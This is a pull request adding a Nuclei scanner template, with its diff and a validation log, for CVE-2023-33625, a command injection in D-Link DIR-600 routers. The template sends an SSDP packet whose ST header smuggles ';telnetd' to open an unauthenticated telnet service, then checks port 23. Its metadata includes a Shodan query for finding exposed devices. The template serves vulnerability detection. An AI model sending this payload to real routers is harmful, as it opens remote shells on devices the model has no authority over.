### PR TITLE
Create CVE-2023-33625.yaml

### DIFF
--- a/javascript/cves/2023/CVE-2023-33625.yaml
+++ b/javascript/cves/2023/CVE-2023-33625.yaml
@@ -8,6 +8,8 @@ info:
     D-Link DIR-600 Hardware Version B5, Firmware Version 2.18 was discovered to contain a command injection vulnerability via the ST parameter in the lxmldbc_system() function.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-33625
+    - https://hackmd.io/@naihsin/By2datZD2
+    - https://github.com/naihsin/IoT/blob/main/D-Link/DIR-600/cmd%20injection/README.md
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -16,7 +18,12 @@ info:
     epss-score: 0.000850000
     epss-percentile: 0.355470000
     cpe: cpe:2.3:o:dlink:dir-600_firmware:2.18:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    shodan-query: "DIR-600"
+    verified: true
   tags: cve,cve2023,rce,js,dlink
+
 javascript:
   - code: |
       let message = 'M-SEARCH * HTTP/1.1\r\n' +

--- a/javascript/cves/2023/CVE-2023-33625.yaml
+++ b/javascript/cves/2023/CVE-2023-33625.yaml
@@ -1,0 +1,56 @@
+id: CVE-2023-33625
+
+info:
+  name: D-link DIR-600 - Unauthenticated Remote Code Execution
+  author: gy741
+  severity: critical
+  description: |
+    D-Link DIR-600 Hardware Version B5, Firmware Version 2.18 was discovered to contain a command injection vulnerability via the ST parameter in the lxmldbc_system() function.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-33625
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-33625
+    cwe-id: CWE-77
+    epss-score: 0.000850000
+    epss-percentile: 0.355470000
+    cpe: cpe:2.3:o:dlink:dir-600_firmware:2.18:*:*:*:*:*:*:*
+  tags: cve,cve2023,rce,js,dlink
+javascript:
+  - code: |
+      let message = 'M-SEARCH * HTTP/1.1\r\n' +
+      'HOST: ' + `${Host}:${Port}` + '\r\n' +
+      'ST: urn:device:1;telnetd\r\n' +
+      'MX: 2\r\n' +
+      'MAN: "ssdp:discover"\r\n\r\n';
+      let packet = bytes.NewBuffer();
+      packet.WriteString(message)
+      let c = require("nuclei/net");
+      let conn = c.Open('udp', `${Host}:${Port}`);
+      conn.SendHex(packet.Hex());
+      for(var start = new Date().getTime(); new Date().getTime() < start + 3000;);
+
+    args:
+      Host: "{{Host}}"
+      Port: 1900
+
+  - code: |
+      let m = require('nuclei/telnet');
+      let c = m.TelnetClient();
+      a = c.IsTelnet(Host, Port);
+      to_json(a);
+
+    args:
+      Host: "{{Host}}"
+      Port: 23
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"IsTelnet": true'
+
+      - type: dsl
+        dsl:
+          - 'success == true'


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2023-33625

```
D-Link DIR-600 Hardware Version B5, Firmware Version 2.18 was discovered to contain a command injection vulnerability via the ST parameter in the lxmldbc_system() function.
```

- References: https://nvd.nist.gov/vuln/detail/CVE-2023-33625

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

```
[DBG] [CVE-2023-33625] Dumped Javascript request for 192.168.0.1:1900:
Variables:
        1. Host => 192.168.0.1
        2. Port => 1900 address=192.168.0.1:1900
[DBG]  [] Javascript Code:

        let message = 'M-SEARCH * HTTP/1.1\r\n' +
            'HOST: ' + `${Host}:${Port}` + '\r\n' +                                                    
            'ST: urn:device:1;telnetd\r\n' +                                                           
            'MX: 2\r\n' +                                                                              
            'MAN: "ssdp:discover"\r\n\r\n';                                                            
        let packet = bytes.NewBuffer();                                                                
        packet.WriteString(message)                                                                    
        let c = require("nuclei/net");                                                                 
        let conn = c.Open('udp', `${Host}:${Port}`);                                                   
        conn.SendHex(packet.Hex());                                                                    
        for (var start = new Date().getTime(); new Date().getTime() < start + 3000;);                  

[DBG] [CVE-2023-33625] Dumped Javascript response for 192.168.0.1:1900:
        1. response => 
        2. success => false address=192.168.0.1:1900
[DBG] [CVE-2023-33625] Dumped Javascript request for 192.168.0.1:23:
Variables:
        1. Host => 192.168.0.1
        2. Port => 23 address=192.168.0.1:23
[DBG]  [CVE-2023-33625] Javascript Code:

        let m = require('nuclei/telnet');
        let c = m.TelnetClient();                                                                      
        a = c.IsTelnet(Host, Port);                                                                    
        to_json(a);                                                                                    

[DBG] [CVE-2023-33625] Dumped Javascript response for 192.168.0.1:23:
        1. response => {   "IsTelnet": true,   " .... fd01fffd21fffb01fffb03" }
        2. success => true address=192.168.0.1:23
[CVE-2023-33625:dsl-2] [javascript] [critical] 192.168.0.1:23
[CVE-2023-33625:word-1] [javascript] [critical] 192.168.0.1:23
```

#### Additional Details (leave it blank if not applicable)

Perform RCE using the udp protocol.

Sleep in JavaScript considering the Telnet server execution time.

```
for(var start = new Date().getTime(); new Date().getTime() < start + 3000;);
```

```response == true``` does not work in the DSL matchers part. Therefore, the match was performed using the word type.
